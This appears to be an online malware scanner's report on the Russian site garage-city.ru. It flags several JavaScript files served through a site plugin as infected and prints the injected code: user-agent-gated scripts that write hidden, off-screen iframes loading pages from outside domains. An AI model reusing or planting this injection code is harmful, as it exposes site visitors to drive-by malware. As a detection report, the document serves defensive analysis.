Scanned pages/files
Request | Server response | Status |
http://www.garage-city.ru/ | 200 OK Content-Length: 28710 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js | 200 OK Content-Length: 20964 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://raficavulerta.zombie-ink.ca/pendinoda15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas(); function Argisuliterkas(){var dude=navigator.userAgent;var artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");}); Antivirus reports:
| ||
http://www.garage-city.ru/search?view=search | 200 OK Content-Length: 27621 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=d6a83e92bc352fa38bd29eab3c07e553&type=js | 200 OK Content-Length: 13274 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: lardopasjet.cultura-tayrona.ch function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas(); function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://lardopasjet.cultura-t ...[3397 bytes skipped]... Decoded script: ...[9809 bytes skipped]... FadeDelay,transitionDuration:crossFadeSpeed,transitionText:CTRtransitionText,rotateAction:navTrigger,PlayText:fpssPlayText,PauseText:fpssPauseText,autoplay:autoslide,text_effect:CTRtext_effect,stop:false})}window.addEvent('domready',function(){if($('fpss-container')){setTimeout('init_fpss();',fpssLoaderDelay)}});function ppButtonClicked(){}function clearSlide(){}function showPrev(){}function showNext(){} <iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe><iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://lardopasjet.cultura-tayrona.ch/minofosal15.html This URL is marked by Google as suspicious <iframe src="http://lardopasjet.cultura-tayrona.ch/minofosal15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"> | ||
http://www.garage-city.ru/index.php?option=com_xmap&sitemap=1&Itemid=66 | 200 OK Content-Length: 32178 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/ | 200 OK Content-Length: 32102 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=3f8e357cbc5baec41ca52556e297f787&type=js | 200 OK Content-Length: 14750 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Teobromine(){var w=navigator.userAgent;var n=(w.indexOf("Android")>-1||w.indexOf("Chrome")>-1||w.indexOf("Linux")>-1||w.indexOf("Macintosh")>-1||w.indexOf("IEMobile")>-1||w.indexOf("FreeBSD")>-1||w.indexOf("iPhone")>-1||w.indexOf("iPad")>-1);if(!n){document.write('<iframe src="http://qiolkajet.xemphimnhanh.org/cubebacort15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>');}} Teobromine(); func artLoadEvent.add(function(){artButtonsSetupJsHover("art-button");});artLoadEvent.add(function(){artButtonsSetupJsHover("button");artButtonsSetupJsHover("readon");}); Antivirus reports:
| ||
http://www.garage-city.ru/arendatory/22a-133 | 200 OK Content-Length: 26736 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=15238108fcbc520b26f51da91955c3dd&type=js | 200 OK Content-Length: 20969 Content-Type: text/javascript | clean |
http://www.garage-city.ru/arendatory/22avtotehnolodzhi33 | 200 OK Content-Length: 26697 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22avtotreiyd-m33 | 200 OK Content-Length: 26567 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22akorn-sb33 | 200 OK Content-Length: 26483 Content-Type: text/html | clean |
http://www.garage-city.ru/plugins/system/JCH_Optimize/jscss.php?f=28910921348407404324163cd4041350&type=js&gz=gz | 200 OK Content-Length: 6560 Content-Type: text/javascript | clean |
http://www.garage-city.ru/arendatory/tehcentr-22vyhlop33 | 200 OK Content-Length: 30390 Content-Type: text/html | clean |
http://www.garage-city.ru/arendatory/22avto-draiyv33 | 200 OK Content-Length: 27783 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: garage-city.ru
Result:
GET / HTTP/1.1
Host: garage-city.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: garage-city.ru
Referer: http://www.google.com/search?q=garage-city.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: garage-city.ru
Referer: http://www.google.com/search?q=garage-city.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=garage-city.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://garage-city.ru/
Result: garage-city.ru is not infected or malware details are not published yet.
Result: garage-city.ru is not infected or malware details are not published yet.